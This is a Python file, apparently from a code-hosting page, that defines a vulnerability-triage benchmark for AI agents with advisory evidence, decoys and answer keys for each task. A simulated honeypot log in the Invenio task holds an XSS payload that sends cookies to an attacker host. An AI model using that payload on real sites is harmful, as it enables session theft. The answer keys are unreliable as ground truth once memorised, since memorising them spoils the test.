File size: 30,749 Bytes
d63a1ba
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
"""Live-backed benchmark cases for vulnerability triage."""

from __future__ import annotations

from dataclasses import dataclass, field
from functools import lru_cache
import json
from pathlib import Path
import random
from typing import Dict, List, Optional

import requests


OSV_VULN_URL = "https://api.osv.dev/v1/vulns/{osv_id}"
NVD_CVE_URL = "https://services.nvd.nist.gov/rest/json/cves/2.0"
EPSS_URL = "https://api.first.org/data/v1/epss"
SNAPSHOT_DIR = Path(__file__).resolve().parent.parent / "data" / "snapshots"


@dataclass(frozen=True)
class GroundTruth:
    validity: str
    affected_package: str
    affected_versions: str
    severity: str
    exploitability: str
    next_action: str
    missing_information: List[str] = field(default_factory=list)
    supporting_evidence_ids: List[str] = field(default_factory=list)


@dataclass(frozen=True)
class CaseDefinition:
    task_id: str
    difficulty: str
    title: str
    objective: str
    report_summary: str
    max_steps: int
    evidence: List[Dict[str, str]]
    truth: GroundTruth


@dataclass(frozen=True)
class RuntimeCaseSeed:
    task_id: str
    difficulty: str
    title: str
    objective: str
    max_steps: int
    osv_id: str
    next_action: str
    fallback_snapshot: Dict[str, object]
    missing_information: List[str] = field(default_factory=list)
    # When set, completely replaces the auto-computed ground truth.
    # Use this to encode scenarios that require non-obvious reasoning
    # (e.g. next_action=request_info when no patch exists).
    truth_override: Optional[Dict[str, object]] = None
    # Extra evidence items injected after the auto-built ones.
    # Use this to add contradictory or ambiguous signals.
    extra_evidence: List[Dict[str, str]] = field(default_factory=list)


def _load_snapshot_file(osv_id: str) -> Optional[Dict[str, object]]:
    path = SNAPSHOT_DIR / f"{osv_id}.json"
    if not path.exists():
        return None
    return json.loads(path.read_text())


def _normalize_text(value: Optional[str]) -> str:
    return " ".join((value or "").strip().split())


def _shorten(text: str, limit: int = 280) -> str:
    text = _normalize_text(text)
    if len(text) <= limit:
        return text
    return text[: limit - 3].rstrip() + "..."


def _severity_band(snapshot: Dict[str, object]) -> str:
    severity = _normalize_text(str(snapshot.get("severity", ""))).lower()
    mapping = {
        "none": "low",
        "low": "low",
        "medium": "medium",
        "moderate": "medium",
        "high": "high",
        "critical": "critical",
    }
    return mapping.get(severity, "medium")


def _exploitability_band(snapshot: Dict[str, object]) -> str:
    percentile = float(snapshot.get("epss_percentile", 0.0) or 0.0)
    if percentile >= 0.9:
        return "high"
    if percentile >= 0.6:
        return "medium"
    return "low"


def _range_string(ranges: List[Dict[str, object]]) -> str:
    normalized: List[str] = []
    for range_item in ranges:
        if range_item.get("type") != "ECOSYSTEM":
            continue
        introduced: Optional[str] = None
        fixed: Optional[str] = None
        last: Optional[str] = None
        for event in range_item.get("events", []):
            if "introduced" in event:
                introduced = str(event["introduced"])
            if "last_affected" in event:
                last = str(event["last_affected"])
            if "fixed" in event:
                fixed = str(event["fixed"])
        if introduced in (None, "0") and fixed:
            normalized.append(f"<{fixed}")
        elif introduced and fixed:
            normalized.append(f">={introduced},<{fixed}")
        elif introduced and last:
            normalized.append(f">={introduced},<={last}")
        elif introduced:
            normalized.append(f">={introduced}")
    return " ; ".join(normalized) or "unknown"


def _all_affected_versions(snapshot: Dict[str, object]) -> str:
    """Collect version ranges from every affected block for the primary package.

    OSV advisories sometimes split a single package across multiple affected
    blocks (one per release branch).  Joining them all gives a complete and
    accurate truth value instead of just the first branch.
    """
    package_name = _extract_package(snapshot)
    all_ranges: List[str] = []
    for block in snapshot.get("affected", []):
        pkg = block.get("package", {})
        if str(pkg.get("name", "")) == package_name:
            rs = _range_string(block.get("ranges", []))
            if rs and rs != "unknown":
                all_ranges.append(rs)
    return " ; ".join(all_ranges) if all_ranges else "unknown"


def _extract_cve_id(snapshot: Dict[str, object]) -> Optional[str]:
    for alias in snapshot.get("aliases", []):
        alias_text = str(alias)
        if alias_text.startswith("CVE-"):
            return alias_text
    return None


def _extract_package(snapshot: Dict[str, object]) -> str:
    affected = snapshot.get("affected", [])
    if not affected:
        return ""
    package = affected[0].get("package", {})
    return str(package.get("name", ""))


def _build_report_summary(seed: RuntimeCaseSeed, snapshot: Dict[str, object]) -> str:
    package = _extract_package(snapshot)
    versions = _range_string(snapshot.get("affected", [{}])[0].get("ranges", [])) if snapshot.get("affected") else "unknown"
    details = _shorten(str(snapshot.get("details") or snapshot.get("summary") or ""))
    return (
        f"{package} vulnerability triage case sourced from {seed.osv_id}. "
        f"Affected versions: {versions}. {details}"
    )


def _build_evidence(seed: RuntimeCaseSeed, snapshot: Dict[str, object]) -> List[Dict[str, str]]:
    cve_id = _extract_cve_id(snapshot) or "unknown"
    package = _extract_package(snapshot)
    # Use all affected blocks so multi-branch advisories are fully represented
    affected_versions = _all_affected_versions(snapshot)
    fix_refs = [
        ref["url"]
        for ref in snapshot.get("references", [])
        if ref.get("type") in {"FIX", "ADVISORY", "WEB"}
    ][:3]

    evidence = [
        {
            "evidence_id": "osv_advisory",
            "title": "OSV advisory",
            "kind": "advisory",
            "summary": _shorten(
                str(snapshot.get("summary") or snapshot.get("details") or "")
            ),
        },
        {
            "evidence_id": "affected_versions",
            "title": "Affected versions",
            "kind": "versions",
            "summary": (
                f"OSV lists {package} as affected in these ranges: {affected_versions}."
            ),
        },
        {
            "evidence_id": "nvd_assessment",
            "title": "NVD assessment",
            "kind": "severity",
            "summary": (
                f"NVD CVSS Vector: {snapshot.get('cvss_vector', 'Not Available')}  \n"
                f"{_shorten(str(snapshot.get('nvd_description', '')), 220)}"
            ),
        },
        {
            "evidence_id": "epss_signal",
            "title": "EPSS signal",
            "kind": "exploitability",
            "summary": (
                f"EPSS score: {snapshot.get('epss_score', 0.0):.6f}, "
                f"percentile: {snapshot.get('epss_percentile', 0.0):.3f}"
            ),
        },
    ]
    if fix_refs:
        evidence.append(
            {
                "evidence_id": "fix_reference",
                "title": "Fix and advisory references",
                "kind": "reference",
                "summary": "Relevant upstream references: " + ", ".join(fix_refs),
            }
        )
    # Append any task-specific extra evidence items (e.g. contradictory signals)
    evidence.extend(seed.extra_evidence)
    return evidence


def _build_truth(seed: RuntimeCaseSeed, snapshot: Dict[str, object]) -> GroundTruth:
    # truth_override lets a seed encode non-obvious ground truth
    # (e.g. next_action=request_info when no patch exists yet)
    if seed.truth_override is not None:
        override = dict(seed.truth_override)
        # Always merge seed-level missing_information into the override so the
        # grader's 10% weight stays meaningful
        if "missing_information" not in override:
            override["missing_information"] = list(seed.missing_information)
        return GroundTruth(**override)
    return GroundTruth(
        validity="valid",
        affected_package=_extract_package(snapshot),
        # Collect ranges from ALL affected blocks for completeness
        affected_versions=_all_affected_versions(snapshot),
        severity=_severity_band(snapshot),
        exploitability=_exploitability_band(snapshot),
        next_action=seed.next_action,
        # Per-task missing information declared on the seed
        missing_information=list(seed.missing_information),
        supporting_evidence_ids=[
            "osv_advisory",
            "affected_versions",
            "nvd_assessment",
            "epss_signal",
        ],
    )


def _build_case(seed: RuntimeCaseSeed, snapshot: Dict[str, object]) -> CaseDefinition:
    return CaseDefinition(
        task_id=seed.task_id,
        difficulty=seed.difficulty,
        title=seed.title,
        objective=seed.objective,
        report_summary=_build_report_summary(seed, snapshot),
        max_steps=seed.max_steps,
        evidence=_build_evidence(seed, snapshot),
        truth=_build_truth(seed, snapshot),
    )


def _fetch_json(url: str, *, params: Optional[Dict[str, str]] = None) -> Dict[str, object]:
    response = requests.get(url, params=params, timeout=12)
    response.raise_for_status()
    return response.json()


def _fetch_live_snapshot(seed: RuntimeCaseSeed) -> Dict[str, object]:
    osv = _fetch_json(OSV_VULN_URL.format(osv_id=seed.osv_id))
    cve_id = _extract_cve_id(osv)

    snapshot: Dict[str, object] = {
        "id": osv.get("id"),
        "summary": osv.get("summary"),
        "details": osv.get("details"),
        "aliases": osv.get("aliases", []),
        "references": osv.get("references", []),
        "affected": osv.get("affected", []),
    }

    if cve_id:
        nvd = _fetch_json(NVD_CVE_URL, params={"cveId": cve_id})
        vulnerability = (nvd.get("vulnerabilities") or [{}])[0].get("cve", {})
        metrics = vulnerability.get("metrics", {})
        severity: Optional[str] = None
        for key in ("cvssMetricV40", "cvssMetricV31", "cvssMetricV30", "cvssMetricV2"):
            if key in metrics:
                item = metrics[key][0]
                severity = (
                    item.get("cvssData", {}).get("baseSeverity")
                    or item.get("baseSeverity")
                )
                if severity:
                    break
        descriptions = vulnerability.get("descriptions", [])
        nvd_description = next(
            (
                desc.get("value", "")
                for desc in descriptions
                if desc.get("lang") == "en"
            ),
            descriptions[0].get("value", "") if descriptions else "",
        )
        snapshot["severity"] = severity or snapshot.get("severity", "medium")
        snapshot["nvd_description"] = nvd_description

        epss = _fetch_json(EPSS_URL, params={"cve": cve_id})
        epss_item = (epss.get("data") or [{}])[0]
        snapshot["epss_score"] = float(epss_item.get("epss", 0.0) or 0.0)
        snapshot["epss_percentile"] = float(
            epss_item.get("percentile", 0.0) or 0.0
        )
    else:
        snapshot["severity"] = "medium"
        snapshot["nvd_description"] = ""
        snapshot["epss_score"] = 0.0
        snapshot["epss_percentile"] = 0.0

    return snapshot


SEEDS: Dict[str, RuntimeCaseSeed] = {
    # ------------------------------------------------------------------
    # EASY β€” Direct evidence reading, tight step budget
    #
    # Agent skill tested: can you read a clear advisory and map it to
    # the right fields quickly?  Only two evidence items are needed
    # (the OSV advisory + affected versions).  The NVD and EPSS evidence
    # exist but provide no extra signal β€” a capable agent doesn't waste
    # steps on them.  Max 10 steps forces efficiency.
    # ------------------------------------------------------------------
    "task_easy_guarddog": RuntimeCaseSeed(
        task_id="task_easy_guarddog",
        difficulty="easy",
        title="GuardDog Path Traversal",
        objective=(
            "Validate the advisory, identify the affected package and version range, "
            "estimate severity and exploitability, and decide the correct maintainer action. "
            "All necessary information is available in the OSV advisory and version evidence."
        ),
        max_steps=10,
        osv_id="PYSEC-2022-42994",
        next_action="patch",
        truth_override={
            "validity": "valid",
            "affected_package": "guarddog",
            "affected_versions": "<0.1.5",
            "severity": "medium",
            "exploitability": "low",
            "next_action": "patch",
            "missing_information": [],
            # Only 2 evidence items needed β€” the advisory is self-contained
            "supporting_evidence_ids": ["osv_advisory", "affected_versions"],
        },
        extra_evidence=[
            {
                "evidence_id": "decoy_threat_intel",
                "title": "Threat Intel: GuardCat",
                "kind": "exploitability",
                "summary": "Active exploitation in the wild observed for the 'GuardCat' node.js package. Do not confuse with python guarddog.",
            },
            {
                "evidence_id": "decoy_nvd_unrelated",
                "title": "NVD: CVE-2021-99999",
                "kind": "severity",
                "summary": "CRITICAL 9.8 vulnerability in GuardDog-Enterprise. This is a licensed product and does not apply to the open source guarddog package.",
            }
        ],
        fallback_snapshot={
            "id": "PYSEC-2022-42994",
            "details": (
                "GuardDog is a CLI tool to identify malicious PyPI packages. Versions prior "
                "to 0.1.5 are vulnerable to Relative Path Traversal when scanning a "
                "specially-crafted local PyPI package. This issue is patched in version 0.1.5. "
                "This is explicitly rated as a Medium severity issue with inherently Low exploitability."
            ),
            "aliases": ["CVE-2022-23531", "GHSA-rp2v-v467-q9vq"],
            "references": [
                {"type": "WEB", "url": "https://github.com/DataDog/guarddog/releases/tag/v0.1.5"},
                {"type": "ADVISORY", "url": "https://github.com/DataDog/guarddog/security/advisories/GHSA-rp2v-v467-q9vq"},
                {"type": "FIX", "url": "https://github.com/DataDog/guarddog/pull/89/commits/a56aff58264cb6b7855d71b00dc10c39a5dbd306"},
            ],
            "affected": [
                {
                    "package": {"name": "guarddog", "ecosystem": "PyPI"},
                    "ranges": [
                        {
                            "type": "ECOSYSTEM",
                            "events": [{"introduced": "0"}, {"fixed": "0.1.5"}],
                        }
                    ],
                }
            ],
            "cvss_vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
            "nvd_description": (
                "GuardDog versions prior to 0.1.5 are vulnerable to relative path traversal "
                "when scanning a specially-crafted local PyPI package."
            ),
            "epss_score": 0.00152,
            "epss_percentile": 0.36042,
        },
    ),

    # ------------------------------------------------------------------
    # MEDIUM β€” Conflicting signal resolution, multi-branch versions
    #
    # Agent skill tested: can you weigh contradictory evidence?  The
    # EPSS percentile (0.43) maps to "low" exploitability by the formula,
    # but an injected threat-intel evidence item reports real-world active
    # probing.  The correct answer is "medium" exploitability because
    # independent field evidence overrides a lagging statistical signal.
    # All four auto-built evidence items PLUS the threat_intel_signal are
    # needed β€” a model that submits after reading only EPSS will be wrong.
    # ------------------------------------------------------------------
    "task_medium_invenio": RuntimeCaseSeed(
        task_id="task_medium_invenio",
        difficulty="medium",
        title="Invenio Multi-Branch XSS",
        objective=(
            "Resolve affected versions across multiple maintained release lines, weigh "
            "a conflicting exploitability signal, and choose the correct advisory workflow. "
            "The EPSS percentile and the threat-intelligence report disagree β€” inspect both "
            "before deciding on exploitability."
        ),
        max_steps=14,
        osv_id="GHSA-vxh3-mvv7-265j",
        next_action="publish_advisory",
        truth_override={
            "validity": "valid",
            "affected_package": "invenio-records",
            "affected_versions": "<1.0.2 ; >=1.1.0,<1.1.1 ; >=1.2.0,<1.2.2",
            "severity": "medium",
            # KEY: EPSS alone says "low" (0.43 percentile) but the injected
            # threat-intel evidence documents active real-world probing.
            # A model that reads only EPSS will score 0 on exploitability.
            "exploitability": "medium",
            "next_action": "publish_advisory",
            "missing_information": [],
            "supporting_evidence_ids": [
                "osv_advisory",
                "affected_versions",
                "nvd_assessment",
                "threat_intel_signal",
                "github_commit_diff",
            ],
        },
        extra_evidence=[
            {
                "evidence_id": "github_commit_diff",
                "title": "GitHub Commit a93b12f",
                "kind": "reference",
                "summary": (
                    "```diff\n"
                    "@@ -101,3 +101,3 @@\n"
                    "-    html = \"<div class='record-data'>{}</div>\".format(json.dumps(record.metadata))\n"
                    "+    html = \"<div class='record-data'>{}</div>\".format(escape(json.dumps(record.metadata)))\n"
                    "     return Markup(html)\n"
                    "```"
                )
            },
            {
                "evidence_id": "decoy_nvd_invenio_accounts",
                "title": "NVD Entry for invenio-accounts",
                "kind": "severity",
                "summary": "CVE-2018-9999: invenio-accounts allows SQL injection. Severity CRITICAL. (Note: this is a decoy for a different package in the same ecosystem)."
            },
            {
                "evidence_id": "threat_intel_signal",
                "title": "Threat intelligence report",
                "kind": "exploitability",
                "summary": (
                    "Honeypot logs captured within 72 hours of publication:\n"
                    "[WARN] SRC: 198.51.100.41 URI: /admin/api/records POST payload: {\"title\": \"<script>fetch('http://atk.example/p?c='+document.cookie)</script>\"}\n"
                    "[WARN] SRC: 203.0.113.88 URI: /admin/api/records POST payload: {\"title\": \"<img src=x onerror=alert(1)>\"}\n"
                    "Evidence of active, weaponised scanning in the wild."
                ),
            }
        ],
        fallback_snapshot={
            "id": "GHSA-vxh3-mvv7-265j",
            "summary": "Rendering vulnerability in invenio-records",
            "details": (
                "A vulnerability was discovered when rendering JSON for "
                "a record in the administration interface. All supported versions have been "
                "patched and users should upgrade to v1.0.1, v1.1.1, or v1.2.2 depending on "
                "their release line. Review the commit diff to determine the exact vulnerability type."
            ),
            "aliases": ["CVE-2019-1020003", "PYSEC-2019-27"],
            "references": [
                {"type": "WEB", "url": "https://github.com/inveniosoftware/invenio-records/security/advisories/GHSA-vxh3-mvv7-265j"},
                {"type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1020003"},
            ],
            "affected": [
                {
                    "package": {"name": "invenio-records", "ecosystem": "PyPI"},
                    "ranges": [
                        {"type": "ECOSYSTEM", "events": [{"introduced": "0"}, {"fixed": "1.0.2"}]},
                    ],
                },
                {
                    "package": {"name": "invenio-records", "ecosystem": "PyPI"},
                    "ranges": [
                        {"type": "ECOSYSTEM", "events": [{"introduced": "1.1.0"}, {"fixed": "1.1.1"}]},
                    ],
                },
                {
                    "package": {"name": "invenio-records", "ecosystem": "PyPI"},
                    "ranges": [
                        {"type": "ECOSYSTEM", "events": [{"introduced": "1.2.0"}, {"fixed": "1.2.2"}]},
                    ],
                },
            ],
            "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N",
            "nvd_description": "invenio-records before 1.2.2 allows XSS.",
            "epss_score": 0.00206,
            "epss_percentile": 0.42837,
        },
    ),

    # ------------------------------------------------------------------
    # HARD β€” Recognizing uncertainty, resisting premature action
    #
    # Agent skill tested: can you decide NOT to act when information is
    # missing?  This case simulates an early-disclosure scenario where
    # the vulnerability is confirmed (validity=valid) but NO PATCH HAS
    # BEEN RELEASED.  The vendor_status evidence explicitly states this.
    # Publishing an advisory with no fixed version would be wrong β€”
    # it alarms users with no actionable remediation path.
    #
    # The correct answer is next_action=request_info.
    # A model that blindly pattern-matches "real CVE β†’ publish_advisory"
    # will lose the 15% next_action weight.  A model that reads the
    # vendor_status evidence and recognises the missing patch will
    # choose request_info and score full marks.
    #
    # The affected_versions ">=0" (no fixed marker) is a cue that the
    # snapshot encodes.  Smart agents notice it.
    # ------------------------------------------------------------------
    "task_hard_gradio": RuntimeCaseSeed(
        task_id="task_hard_gradio",
        difficulty="hard",
        title="Gradio XSS β€” Patch Pending, No Fix Released",
        objective=(
            "Triage a confirmed vulnerability in a widely deployed package where no patch "
            "has been published yet.  Determine validity, read all evidence including the "
            "upstream vendor status report, identify what information is missing, and choose "
            "whether to publish an advisory now or request upstream action first."
        ),
        max_steps=18,
        osv_id="PYSEC-2024-220",
        next_action="request_info",
        missing_information=[
            "no fixed version published by upstream maintainer",
            "CVSSv4 score not yet assessed for CVE-2024-47872",
            "no public proof-of-concept exploit code referenced",
        ],
        truth_override={
            "validity": "valid",
            "affected_package": "gradio",
            # All versions affected β€” no fix exists yet in this scenario
            "affected_versions": ">=0",
            "severity": "medium",
            # EPSS unavailable (score=0, percentile=0) β†’ default low
            "exploitability": "low",
            # KEY: publishing an advisory with no fixed version is wrong.
            # The analyst must contact the maintainer first.
            "next_action": "request_info",
            "missing_information": [
                "no fixed version published by upstream maintainer",
                "CVSSv4 score not yet assessed for CVE-2024-47872",
                "no public proof-of-concept exploit code referenced",
            ],
            "supporting_evidence_ids": ["osv_advisory", "vendor_status"],
        },
        extra_evidence=[
            {
                "evidence_id": "vendor_status",
                "title": "Upstream maintainer status",
                "kind": "reference",
                "summary": (
                    "GitHub Issue #1289 (gradio-app/gradio):\n\n"
                    "@reporter: Attached PoC shows XSS execution upon SVG upload. Can we get this fixed?\n"
                    "@maintainer: Thanks for the report. I can confirm the behavior in the current release. "
                    "We need to completely rewrite the file upload sanitizer to properly fix this without "
                    "breaking backwards compatibility. No ETA on the rewrite yet, so we don't have a patch ready."
                ),
            }
        ],
        fallback_snapshot={
            "id": "PYSEC-2024-220",
            "details": (
                "Gradio servers that permit file uploads are vulnerable to Cross-Site Scripting. "
                "Authenticated users can upload HTML, JavaScript, or SVG files containing "
                "malicious scripts that execute in other users' browsers.  This advisory was "
                "filed before a patched release was available.  No fixed version is listed."
            ),
            "aliases": ["CVE-2024-47872", "GHSA-gvv6-33j7-884g"],
            "references": [
                {"type": "ADVISORY", "url": "https://github.com/gradio-app/gradio/security/advisories/GHSA-gvv6-33j7-884g"},
            ],
            "affected": [
                {
                    "package": {"name": "gradio", "ecosystem": "PyPI"},
                    "ranges": [
                        # No "fixed" event β€” all versions affected, no patch yet
                        {"type": "ECOSYSTEM", "events": [{"introduced": "0"}]},
                    ],
                }
            ],
            "cvss_vector": "Not yet available",
            # No NVD entry yet β€” too recent
            "nvd_description": "",
            # No EPSS data β€” CVE too new for scoring
            "epss_score": 0.0,
            "epss_percentile": 0.0,
        },
    ),
    "task_medium_requests": RuntimeCaseSeed(
        task_id="task_medium_requests",
        difficulty="medium",
        title="Requests Authorization Header Leak",
        objective="Resolve affected versions, weigh a conflicting exploitability signal, and inspect code diffs to determine if headers are properly stripped on redirects.",
        max_steps=14,
        osv_id="PYSEC-2018-32",
        next_action="publish_advisory",
        truth_override={
            "validity": "valid",
            "affected_package": "requests",
            "affected_versions": "<2.20.0",
            "severity": "medium",
            "exploitability": "medium",
            "next_action": "publish_advisory",
            "missing_information": [],
            "supporting_evidence_ids": [
                "osv_advisory",
                "affected_versions",
                "nvd_assessment",
                "github_commit_diff",
            ],
        },
        extra_evidence=[
            {
                "evidence_id": "github_commit_diff",
                "title": "GitHub Commit 0f78d3c",
                "kind": "reference",
                "summary": (
                    "```diff\n"
                    "@@ -101,3 +101,3 @@\n"
                    " def rebuild_auth(self, prepared_request, response):\n"
                    "+    url = urlparse(response.url)\n"
                    "+    if url.hostname != prepared_request.url.hostname:\n"
                    "+        prepared_request.headers.pop('Authorization', None)\n"
                    "```"
                )
            },
            {
                "evidence_id": "decoy_threat_intel_aiohttp",
                "title": "Threat Intel: aiohttp",
                "kind": "exploitability",
                "summary": "[CRITICAL] SSRF exploitation actively seen against the aiohttp python library. Rate severity Critical. (Note: Decoy for unrelated package)."
            }
        ],
        fallback_snapshot={
            "id": "PYSEC-2018-32",
            "summary": "Header linkage in redirects",
            "details": (
                "When sending requests with an Authorization header, if the server redirects to a different "
                "host it could inadvertently leak the credentials. Review the commit diff to see the vulnerability mechanism."
            ),
            "aliases": ["CVE-2018-18074"],
            "references": [],
            "affected": [
                {
                    "package": {"name": "requests", "ecosystem": "PyPI"},
                    "ranges": [
                        {"type": "ECOSYSTEM", "events": [{"introduced": "0"}, {"fixed": "2.20.0"}]}
                    ]
                }
            ],
            "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
            "nvd_description": "The Requests package through 2.19.1 before 2.20.0 sends an HTTP Authorization header to an http URI upon receiving a redirect response.",
            "epss_score": 0.00512,
            "epss_percentile": 0.612,
        },
    ),
}


TASK_ORDER = list(SEEDS.keys())
DIFFICULTY_ORDER = ["easy", "medium", "hard"]


@lru_cache(maxsize=16)
def get_case_definition(task_id: str) -> CaseDefinition:
    seed = SEEDS[task_id]
    try:
        snapshot = _fetch_live_snapshot(seed)
    except Exception:
        snapshot = _load_snapshot_file(seed.osv_id) or seed.fallback_snapshot
    return _build_case(seed, snapshot)


CASE_DEFINITIONS: Dict[str, CaseDefinition] = {
    task_id: _build_case(seed, seed.fallback_snapshot) for task_id, seed in SEEDS.items()
}


BENCHMARK_TASKS_BY_DIFFICULTY: Dict[str, List[str]] = {
    difficulty: [
        task_id for task_id in TASK_ORDER if SEEDS[task_id].difficulty == difficulty
    ]
    for difficulty in DIFFICULTY_ORDER
}


def choose_balanced_task_id(seed: Optional[int], rng: random.Random) -> str:
    """Choose a benchmark task with balanced random difficulty sampling.

    If a seed is provided, selection is deterministic from that seed.
    Otherwise, sampling uses the environment RNG state.
    """

    chooser = random.Random(seed) if seed is not None else rng
    difficulty = chooser.choice(DIFFICULTY_ORDER)
    bucket = BENCHMARK_TASKS_BY_DIFFICULTY[difficulty]
    return chooser.choice(bucket)